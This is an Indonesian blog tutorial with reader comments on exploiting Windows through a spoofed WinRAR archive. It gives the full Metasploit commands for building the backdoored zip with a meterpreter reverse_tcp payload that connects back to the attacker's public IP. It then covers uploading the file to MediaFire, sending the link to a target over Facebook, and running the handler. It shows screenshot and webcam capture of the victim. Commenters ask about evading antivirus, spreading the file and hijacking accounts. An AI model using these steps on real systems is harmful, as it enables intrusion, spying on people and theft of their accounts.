Menu

Sting Category

 
» » » » » Exploit Windows Menggunakan Winrar dengan Metasploit (Beda Jaringan)

A+ A-
Sebelumnya saya ucapkan selamat tahun baru 2016, semoga ini menjadi lembaran baru yang lebih baik, semoga lebih maju dan sukses untuk kita semua. di awal tahun ini saya masih membahas tentang metasploit, saya akan memberikan tutorial tentang cara Exploit Windows Menggunakan Winrar, oke langsung saja di simak langkah-langkahnya

pertama kita jalankan service porsgresql dan metasploit terlebih dahulu
service postgresql start
service metaploit start
service mwtasploit start

selanjutnya buka msfconsole
msfconsole
Exploit Windows Menggunakan Winrar dengan Metasploit (Beda Jaringan)

Setelah msfconsole terbuka kita buat backdor dengan format .zip, ikutin saja perintahnya
use exploit/windows/fileformat/winrar_name_spoofing
set payload windows/meterpreter/reverse_tcp
set filename Template_Anherr.zip
set spoof template.txt
set lhost 36.70.XXX.XXX
exploit
use exploit/windows/fileformat/winrar_name_spoofing

Keterangan:
Temmplate_Anherr.zip >> Nama File backdor yang di buat (saya ilustrasikan ini merupakan template blog)
Template.txt >> isi dari Temmplate_Anherr.zip
36.70.XXX.XXX >> Ip Public
kenapa saya lhostnya menggunakan ip public, ya karena target yang akan di exploit kali ini adalah berbeda jaringan. jangan lupa jika menggunakan ip  public kalian harus setting port foward pada router. ceklist pada DMZ Enabled
Setting DMZ router

Selanjutnya kita ambil backdoor tadi di folder /root/.msf4/local/ Kemudian upload , disini saya uplod di mediafire, kalian juga bisa coba tempat upload file yang lain.

upload mediafire

mediafire

oke setelah pembuatan backdoor selesai dan di upload, kita jalankan perintah exploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.06
exploit
use exploit/multi/handler

Catatan: untuk lhost isikan ip local
setelah itu kita berikan backdoor tersebut ke target, berikan link yang buat download backdoor tadi ke target :D
kirim fb

Kita tunggu dulu broo, sampai targett download dan membuka file backdoor tadi
dan taraaa...!! ternyata exploit berhasil, meterpreter session opened :v

Meterpreter sessions 1 opened

Saya coba cek informasi sytem korban
sysinfo

Selanjutnya saya coba ambil screenshot laptop korban , dan coba capture wbcam korban

sysinfo

ini hasilnya
screenshot victim

Bubun Galau

sepertinya dia lagi galau broo,wkwkw
udah segitu aja percobaan kali ini
ini hanya untuk pembelajaran semata, target saya disini adalah temen saya sendiri, sebelumnya saya sudah meminta dan sudah di beri izin untuk melakuakn percobaan ini. penyalahgunaan dari tutorial ini itu diluar tanggung jawab saya.
oke sekian tutorial  mengenai cara Exploit Windows Menggunakan Winrar dengan Metasploit semoga bermanfaat bagi kita semua.
Diposting oleh
Label: , , ,

Share to:

di 06.58

Posting Komentar

  1. Juragan1 Januari 2016 pukul 07.16

    anjay foto gau di tempel . =))

    BalasHapus
  2. Dinamikacinta2 Januari 2016 pukul 06.28

    itu backdornya cuma di download aja?

    BalasHapus
    Balasan
    1. Anherr2 Januari 2016 pukul 08.02

      iya terus d buka pake winrar bro, kita bisa masuk meterpreter kalo target buka file yg ada d dalam winrar tersebut

      Hapus
  3. Unknown10 Januari 2016 pukul 05.39

    gan kok gini root@Knuckleman:~# service metasploit start
    Failed to start metasploit.service: Unit metasploit.service failed to load: No such file or directory.

    BalasHapus
    Balasan
    1. Anherr21 Januari 2016 pukul 07.21

      untuk kali linux 2 cara menjalankan metasploit memang sdikit berbeda mas, pke perintah ini
      /etc/init.d/postgresql start
      msfdb init
      msfconsole

      Hapus
  4. Unknown26 Februari 2016 pukul 16.59

    posisi backdoor udah nyangkut gan, mau nanya, apa ada perintah untuk eksekusi browser korban? biar bisa ambil alih akun2 nya gitu :D

    BalasHapus
  5. rizal maulana .h2 Maret 2016 pukul 08.16

    cara setting forwad nya gimana

    BalasHapus
  6. Indra Gunadi5 Maret 2016 pukul 05.57

    Korban udah buka backdoor tapi di terminal gak ada session apa pun .?
    udah set PORT Forwading seperti di tutor kira kira salah apanya.?

    BalasHapus
  7. Hendrikus Dandi16 Agustus 2016 pukul 09.20

    bahaya nih kalau download aplikasi diblog ini, bisa* kena hack nantinya

    BalasHapus
  8. Unknown11 Desember 2016 pukul 19.02

    kalo tanpa router gimana ya

    BalasHapus
  9. Unknown11 Desember 2016 pukul 19.04

    kalo misalkan kita sebar ke blog atau website lain apakah bisa work backdoor ini

    BalasHapus
  10. Unknown11 Februari 2017 pukul 01.37

    klo pke modem usb bisa ngk???

    BalasHapus
  11. Unknown22 Februari 2017 pukul 18.34

    om lihat settingan routernya dong, kenapa ane gagal mulu ya

    BalasHapus
  12. LINUX8 April 2017 pukul 07.27

    kalau wifi nya fiberhome gmna liat dmz nya

    BalasHapus
  13. 27 Freakzz27 Juli 2017 pukul 21.06

    1. Ini sih cuman bisa di tes kalo dirumah pribadi pasang internet wifi ni, soalnya pake setting2 router segala. Kalau kita lagi di cafe gimana gan ? Secara kan kita ga bisa ngakses atau setting router cafe tsb.

    2. Backdoornya terlalu sederhana gan, kira2 backdoor yg begitu doang bisa tembus av ga ? Ntar pas di donlod korban langsung dihapus av laptop korban pula ntu backdoor

    BalasHapus

Langganan: Posting Komentar (Atom)
 
Top